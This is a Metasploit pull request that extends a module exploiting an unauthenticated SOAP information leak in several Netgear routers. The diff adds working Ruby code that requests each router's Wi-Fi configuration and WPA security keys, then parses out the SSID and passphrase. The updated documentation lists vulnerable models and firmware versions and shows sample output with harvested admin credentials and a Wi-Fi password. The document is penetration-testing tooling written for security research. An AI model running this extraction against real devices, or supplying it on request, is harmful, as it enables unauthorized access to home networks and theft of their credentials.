### PR TITLE
enhancements to netgear_soap_password_extractor

### DIFF
--- a/documentation/modules/auxiliary/admin/http/netgear_soap_password_extractor.md
+++ b/documentation/modules/auxiliary/admin/http/netgear_soap_password_extractor.md
@@ -1,21 +1,17 @@
 ## Vulnerable Application
 
 The following list is a non-exhaustive list of vulnerable Netgear devices:
-1.  R6300v2 - V1.0.3.8
-2.  WNDR3300 - V1.0.45
-3.  WNDR3700v1 - V1.0.7.98
-4.  WNDR3700v1 - V1.0.16.98
-5.  WNDR3700v2 - V1.0.1.14
-6.  WNDR3700v4 - V1.0.1.42
-7.  WNDR3700v4 - V1.0.0.4SH
-8.  WNDR3700v4 - V1.0.1.52
-9.  WNDR3800 - V1.0.0.48
-10. WNDR4300 - V1.0.1.60
-11. WNR1000v2 - V1.0.1.1
-12. WNR1000v2 - V1.1.2.58
-13. WNR2000v3 - v1.1.2.10
-14. WNR2200 - V1.0.1.88
-15. WNR2500 - V1.0.0.24
+1.  R6300v2  < [1.0.3.28](http://kb.netgear.com/app/answers/detail/a_id/28372)
+2.  WNDR3300 - V1.0.45 (current, confirmed vuln)
+3.  WNDR3700v1 - 1.0.7.98, 1.0.16.98 (confirmed vuln)
+4.  WNDR3700v2 - 1.0.1.14 (EOL, confirmed vuln)
+5.  WNDR3700v4 < [1.0.2.80](http://kb.netgear.com/app/answers/detail/a_id/28355)
+6.  WNDR3800 - 1.0.0.48 (EOL, confirmed vuln)
+7.  WNDR4300 < [1.0.2.80](http://kb.netgear.com/app/answers/detail/a_id/28037)
+8.  WNR1000v2 - 1.0.1.1, 1.1.2.58 (EOL, confirmed vuln)
+9.  WNR2000v3 < [1.1.2.12](http://kb.netgear.com/app/answers/detail/a_id/30024)
+10. WNR2200 < [1.0.1.96](http://kb.netgear.com/app/answers/detail/a_id/28036)
+11. WNR2500 < [1.0.0.32](http://kb.netgear.com/app/answers/detail/a_id/28351)
 
 ## Verification Steps
 
@@ -39,11 +35,15 @@ msf auxiliary(netgear_soap_password_extractor) > run
 [*] Extracting Firmware version...
 [+] Model wnr2000v3 found
 [+] Firmware version V1.1.2.10 found
-[+] Device details downloaded to: /root/.msf4/loot/20160701181449_default_192.168.1.1_netgear_soap_dev_668524.txt
+[+] Device details downloaded to: /root/.msf4/loot/20160706212637_default_192.168.1.1_netgear_soap_dev_000157.txt
 [*] Extracting credentials...
 [*] Credentials found, extracting...
 [+] admin / password credentials found
-[+] Account details downloaded to: /root/.msf4/loot/20160701181449_default_192.168.1.1_netgear_soap_acc_252579.txt
+[+] Account details downloaded to: /root/.msf4/loot/20160706212637_default_192.168.1.1_netgear_soap_acc_387111.txt
+[*] Extracting Wifi...
+[+] Wifi SSID: NETGEAR44
+[+] Wifi Encryption: WPA2-PSK
+[*] Extracting WPA Keys...
+[+] Wifi Password: netgearpassword22
 [*] Auxiliary module execution completed
-
 ```

--- a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
+++ b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
@@ -41,7 +41,8 @@ class MetasploitModule < Msf::Auxiliary
           'Michael Messner <devnull[at]s3cur1ty.de>',	     # Metasploit module
           'h00die <mike@shorebreaksecurity.com>'       # Metasploit enhancements/docs
         ],
-      'License'     => MSF_LICENSE
+      'License'     => MSF_LICENSE,
+      'DisclosureDate' => 'Feb 11 2015'
     )
   end
 

--- a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
+++ b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
@@ -56,6 +56,16 @@ class MetasploitModule < Msf::Auxiliary
     action = 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo'
     print_status("Extracting credentials...")
     extract_data(action)
+
+    # extract wifi info
+    action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetInfo'
+    print_status("Extracting Wifi...")
+    extract_data(action)
+
+    # extract WPA info
+    action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetWPASecurityKeys'
+    print_status("Extracting WPA Keys...")
+    extract_data(action)
   end
 
   def extract_data(soap_action)
@@ -92,6 +102,21 @@ class MetasploitModule < Msf::Auxiliary
         #store all details as loot
         loot = store_loot('netgear_soap_device.config', 'text/plain', rhost, res.body)
         print_good("Device details downloaded to: #{loot}")
+      end
+
+      if res.body =~ /<NewSSID>(.*)<\/NewSSID>/
+        ssid = $1
+        print_good("Wifi SSID: #{ssid}")
+      end
+
+      if res.body =~ /<NewBasicEncryptionModes>(.*)<\/NewBasicEncryptionModes>/
+        wifi_encryption = $1
+        print_good("Wifi Encryption: #{wifi_encryption}")
+      end
+
+      if res.body =~ /<NewWPAPassphrase>(.*)<\/NewWPAPassphrase>/
+        wifi_password = $1
+        print_good("Wifi Password: #{wifi_password}")
       end
 
     rescue ::Rex::ConnectionError

--- a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
+++ b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
@@ -38,7 +38,8 @@ class MetasploitModule < Msf::Auxiliary
       'Author'      =>
         [
           'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery
-          'Michael Messner <devnull[at]s3cur1ty.de>'	     # Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>',	     # Metasploit module
+          'h00die <mike@shorebreaksecurity.com>'       # Metasploit enhancements/docs
         ],
       'License'     => MSF_LICENSE
     )


### PR DESCRIPTION
This is an enhancement #7055.  Added additional documentation (links to verify firmware version w/ fix) and combined some of the "confirmed" firmware versions.

Also, from the original disclosure, added wifi name and wpa key extraction.  This was previously not being extracted for no reason I can figure out.
Old output:

```
[*] Trying to access the configuration of the device
[*] Extracting Firmware version...
[+] Model wnr2000v3 found
[+] Firmware version V1.1.2.10 found
[+] Device details downloaded to: /root/.msf4/loot/20160701181449_default_192.168.1.1_netgear_soap_dev_668524.txt
[*] Extracting credentials...
[*] Credentials found, extracting...
[+] admin / password credentials found
[+] Account details downloaded to: /root/.msf4/loot/20160701181449_default_192.168.1.1_netgear_soap_acc_252579.txt
[*] Auxiliary module execution completed
```

New output:

```
[*] Trying to access the configuration of the device
[*] Extracting Firmware version...
[+] Model wnr2000v3 found
[+] Firmware version V1.1.2.10 found
[+] Device details downloaded to: /root/.msf4/loot/20160706212637_default_192.168.1.1_netgear_soap_dev_000157.txt
[*] Extracting credentials...
[*] Credentials found, extracting...
[+] admin / password credentials found
[+] Account details downloaded to: /root/.msf4/loot/20160706212637_default_192.168.1.1_netgear_soap_acc_387111.txt
[*] Extracting Wifi...
[+] Wifi SSID: NETGEAR44
[+] Wifi Encryption: WPA2-PSK
[*] Extracting WPA Keys...
[+] Wifi Password: netgearpassword22
[*] Auxiliary module execution completed
```

You'll note the new fields:

```
[*] Extracting Wifi...
[+] Wifi SSID: NETGEAR44
[+] Wifi Encryption: WPA2-PSK
[*] Extracting WPA Keys...
[+] Wifi Password: netgearpassword22
```
